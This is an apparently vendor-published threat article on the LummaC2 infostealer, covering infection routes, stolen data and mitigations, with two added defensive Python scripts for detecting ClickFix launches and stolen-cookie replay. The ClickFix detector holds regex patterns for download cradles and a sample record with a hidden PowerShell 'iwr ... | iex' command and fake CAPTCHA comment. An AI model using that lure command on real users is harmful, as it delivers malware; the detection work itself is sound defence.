LummaC2 Stealer, also known as Lumma Stealer, has emerged as one of 2025’s most dangerous infostealer malware threats. Active since 2022, LummaC2 harvests saved credentials, cookies and other data from browsers such as Chrome, Edge, and Firefox. It also steals cryptocurrency wallet data and can act as a loader, installing other types of malware on the infected device.
It’s available on underground forums as a malware-as-a-service (MaaS) platform, making sophisticated cybercrime accessible to threat actors with minimal technical skills.
In May 2025, Microsoft and the US Department of Justice shut down more than 2,300 malicious domains operating the LummaC2 stealer infrastructure. Despite this, the threat never went away. The number of accounts targeted by LummaC2 is now reported to be returning to pre-takedown levels.
How does LummaC2 infect your devices? Common traps to watch out for
LummaC2 uses multiple infection vectors, including:
- Phishing emails: LummaC2 is distributed via phishing emails impersonating well-known brands. The emails carry malicious attachments, or links to cloned websites, that install LummaC2 on the victim’s device.
- Malvertising: Cybercriminals place fake adverts in search engine results for queries about popular software and apps. The ads link to malicious sites that install LummaC2.
- Drive-by downloads: Cybercriminals compromise legitimate websites, exploiting vulnerabilities or misconfigurations to inject malicious JavaScript. The modified sites install LummaC2 on visitors’ devices, or display malicious content that tricks visitors into installing it themselves.
- Cracked or pirated software: Cybercriminals trojanise legitimate apps so that they install LummaC2, and distribute the tampered versions on file-sharing platforms. Often LummaC2 isn’t bundled in the download itself; the tampered app acts as a loader and fetches it silently later.
- ClickFix techniques: On Windows devices, ClickFix scams trick the victim into running a malicious command themselves, typically by copying text from a web page and pasting it into the Windows Run dialog or a PowerShell window. The pretext is fixing a bogus technical issue, or proving they are not a robot by completing a fake CAPTCHA check.
- Other malware: LummaC2 can be dropped by other malware families, such as DanaBot.
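The ClickFix vector leaves a distinctive trace in endpoint telemetry: an interpreter such as powershell.exe or mshta.exe launched directly by explorer.exe (the Run dialog) with a command line that hides its window, downloads something, and often ends in a pasted comment about being "not a robot". The script below is an added example of how a SOC might score Sysmon process-creation events for that pattern; it is not code from the original article or from any vendor. The indicator weights, the alert threshold and the sample records are constructed for this example.

```python
"""Heuristic ClickFix triage over Sysmon Event ID 1 (process creation) records.

Added example: a hypothetical helper, not part of LummaC2 tooling or any product.
Field names follow Sysmon's ProcessId / Image / ParentImage / CommandLine.
"""
import json
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Interpreters that ClickFix lures tell the victim to paste a command into.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# A parent of explorer.exe means the process came from the shell itself
# (Win+R Run dialog, Start menu, a double-click): a user typed or pasted it.
INTERACTIVE_PARENTS = ("explorer.exe",)

# Command-line indicators and their weights (weights are an assumption here).
INDICATORS = [
    ("encoded_command", 1, re.compile(r"(?i)\s-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window", 1, re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("download_cradle", 1, re.compile(r"(?i)\b(iwr|invoke-webrequest|invoke-restmethod|irm|curl|wget|downloadstring)\b")),
    ("remote_exec", 1, re.compile(r"(?i)\b(iex|invoke-expression)\b|mshta(\.exe)?\s+https?://")),
    # ClickFix pages often append a PowerShell comment so the pasted text
    # looks like a verification step ("# I am not a robot ...").
    ("captcha_lure_comment", 2, re.compile(r"(?i)#.*(robot|captcha|verification)")),
]

ALERT_THRESHOLD = 3


@dataclass
class Finding:
    pid: int
    image: str
    score: int
    indicators: List[str] = field(default_factory=list)


def score_event(event: dict) -> Optional[Finding]:
    """Return a Finding for interpreter launches, or None for other processes."""
    image = event.get("Image", "").lower()
    if not image.endswith(INTERPRETERS):
        return None
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "")
    finding = Finding(pid=event["ProcessId"], image=image, score=0)
    if parent.endswith(INTERACTIVE_PARENTS):
        finding.score += 2
        finding.indicators.append("interactive_parent")
    for name, weight, pattern in INDICATORS:
        if pattern.search(cmdline):
            finding.score += weight
            finding.indicators.append(name)
    return finding


def triage(events_jsonl: str) -> List[Finding]:
    """Score every record and keep those at or above the alert threshold."""
    alerts = []
    for line in events_jsonl.strip().splitlines():
        finding = score_event(json.loads(line))
        if finding and finding.score >= ALERT_THRESHOLD:
            alerts.append(finding)
    return alerts


# Constructed sample records (not real telemetry). Record 2 is the classic
# ClickFix paste: hidden window, download cradle, iex, fake CAPTCHA comment.
# Record 3 is the encoded-command variant. Records 1, 4 and 5 are benign.
SAMPLE_EVENTS = r"""
{"ProcessId": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe"}
{"ProcessId": 2, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -w hidden -c \"iwr http://example.invalid/verify.txt | iex\" # \"I am not a robot - reCAPTCHA Verification ID: 7811\""}
{"ProcessId": 3, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ProcessId": 4, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"}
{"ProcessId": 5, "Image": "C:\\Windows\\System32\\notepad.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "notepad.exe"}
"""

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"pid={alert.pid} score={alert.score} {alert.indicators}")
```

Only records 2 and 3 cross the threshold: a plain interactive PowerShell launch (record 1) and a scheduled backup script run by svchost.exe (record 4) score too low, so the rule keys on the combination of an interactive parent and cradle-style arguments rather than on powershell.exe alone. In a real deployment the same scoring belongs in your SIEM query language, with the interactive-parent condition tuned for environments that launch scripts from the Start menu.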
What makes LummaC2 so dangerous?
LummaC2 has some key features that make it particularly threatening:
- Ready availability with MaaS: On underground forums, LummaC2 is available as an out-of-the-box cybercrime solution, complete with customer support and regular updates.
- Advanced evasion techniques: LummaC2 uses code obfuscation and anti-analysis features to sidestep conventional, signature-based antivirus software and to slow down reverse engineering.
- Real-time data exfiltration: After installation, LummaC2 starts working immediately, stealing data and transmitting it to its command-and-control servers over encrypted channels, so the theft is usually complete before anyone notices the infection.
- Ease of use: A user-friendly interface lets cybercriminals launch sophisticated attacks without advanced technical know-how.
What information does LummaC2 steal?
LummaC2 targets a wide range of sensitive data, including:
- Login credentials for banking, email, and business accounts.
- Autofill data, including addresses, phone numbers, and payment card details.
- Browser cookies and saved sessions, which let criminals replay an already-authenticated session and so bypass multi-factor authentication without ever seeing a one-time code.
- Cryptocurrency wallet information.
- Documents, including PDF, .docx, and .rtf files.
This stolen information fuels further cybercrime: digital fraud, account takeover attacks, and social engineering attacks such as spear phishing or whaling.
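Because a stolen cookie walks straight past MFA, the server side needs its own check: a session token that was minted for one browser and is suddenly presented by a different client is the signature of cookie theft. The script below is an added example of that check over web access logs; it is not code from the original article or from any vendor product. The log format, field names and sample traffic are constructed for this example, and the session identifiers stand in for hashes of the real cookie value (log a hash, never the cookie itself, or the log becomes another place an infostealer can harvest sessions from).

```python
"""Detect a stolen session cookie being replayed from a new client.

Added example, not code from the original article or any vendor product.
Log format and field names are an assumption for this example; only a hash
of the session cookie is logged, never the raw value.
"""
import json
from typing import Dict, List, Set, Tuple

Fingerprint = Tuple[str, str]  # (source IP, User-Agent)


def detect_session_reuse(access_log_jsonl: str) -> List[dict]:
    """Bind each session hash to the first client fingerprint that used it
    and report later requests whose fingerprint differs.

    A changed User-Agent is rated high: a cookie lifted by an infostealer is
    replayed from the attacker's browser or a script, not the victim's. An IP
    change alone is low, since laptops and phones legitimately roam."""
    bound: Dict[str, Fingerprint] = {}
    findings: List[dict] = []
    for line in access_log_jsonl.strip().splitlines():
        entry = json.loads(line)
        sid = entry["session_sha256"]
        fingerprint: Fingerprint = (entry["src_ip"], entry["user_agent"])
        if sid not in bound:
            bound[sid] = fingerprint  # first sight defines the legitimate client
            continue
        original = bound[sid]
        if fingerprint == original:
            continue
        ua_changed = fingerprint[1] != original[1]
        findings.append({
            "session_sha256": sid,
            "time": entry["time"],
            "path": entry["path"],
            "original_client": original,
            "new_client": fingerprint,
            "severity": "high" if ua_changed else "low",
        })
    return findings


def sessions_to_revoke(findings: List[dict]) -> Set[str]:
    """Sessions worth invalidating server-side; MFA alone will not stop them."""
    return {f["session_sha256"] for f in findings if f["severity"] == "high"}


# Constructed sample log (not real traffic). "sess-A"/"sess-B" are placeholder
# labels for session-cookie hashes. Session A is used normally twice, then
# replayed from another network by a scripted client. Session B only changes
# IP address, as a roaming mobile user would.
SAMPLE_LOG = """
{"time": "2025-06-02T10:00:11Z", "session_sha256": "sess-A", "src_ip": "203.0.113.10", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0", "path": "/dashboard"}
{"time": "2025-06-02T10:05:40Z", "session_sha256": "sess-A", "src_ip": "203.0.113.10", "user_agent": "Mozilla/5.0 (Windows NT 10.0) Chrome/124.0", "path": "/reports"}
{"time": "2025-06-02T10:07:02Z", "session_sha256": "sess-A", "src_ip": "198.51.100.7", "user_agent": "python-requests/2.31", "path": "/account/export"}
{"time": "2025-06-02T10:00:55Z", "session_sha256": "sess-B", "src_ip": "192.0.2.5", "user_agent": "Mozilla/5.0 (iPhone) Safari/604.1", "path": "/inbox"}
{"time": "2025-06-02T10:30:19Z", "session_sha256": "sess-B", "src_ip": "192.0.2.77", "user_agent": "Mozilla/5.0 (iPhone) Safari/604.1", "path": "/inbox"}
"""

if __name__ == "__main__":
    results = detect_session_reuse(SAMPLE_LOG)
    for f in results:
        print(f"{f['severity']:4} {f['session_sha256']} {f['original_client']} -> {f['new_client']} {f['path']}")
    print("revoke:", sessions_to_revoke(results))
```

Session A is flagged high and queued for revocation because a scripted client on a different network presented the cookie minutes after the real user; session B only changed IP and is reported at low severity for an analyst to review. The binding is deliberately kept to the first fingerprint rather than updated on each request, so every later attacker request keeps tripping the rule until the session is revoked.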
Mitigation and defence: How to protect against LummaC2
To protect your organisation against the threat from LummaC2:
- Provide security awareness training so that everyone is alert to suspicious emails, attachments, and links, knows how to spot and report potential phishing attempts, and knows never to paste a command from a web page into the Run dialog or a terminal.
- Implement multi-factor authentication (MFA) on all your systems and accounts. Bear in mind that MFA does not help once a session cookie has been stolen, so pair it with short session lifetimes and the ability to revoke active sessions.
- Keep all your software and systems updated and patched to fix vulnerabilities.
- Enforce strict application controls so that users can only install verified software from approved sources.
- Perform regular backups and store them offline to help defend against ransomware attacks.
- Define a password policy that ensures everyone uses strong, unique passwords that they never reuse or share, and stores them in a password manager.
- Use a cyber threat intelligence (CTI) and credential monitoring solution. CTI solutions such as Cybercheck continuously monitor for exposed credentials and personal data, providing early warning so you can act before attackers breach your defences. If cybercriminals are trading information about you or your organisation, we alert you immediately. That means you can stay extra vigilant, take proactive steps such as changing passwords or blocking cards, and shut out the attackers before they make you their next victim.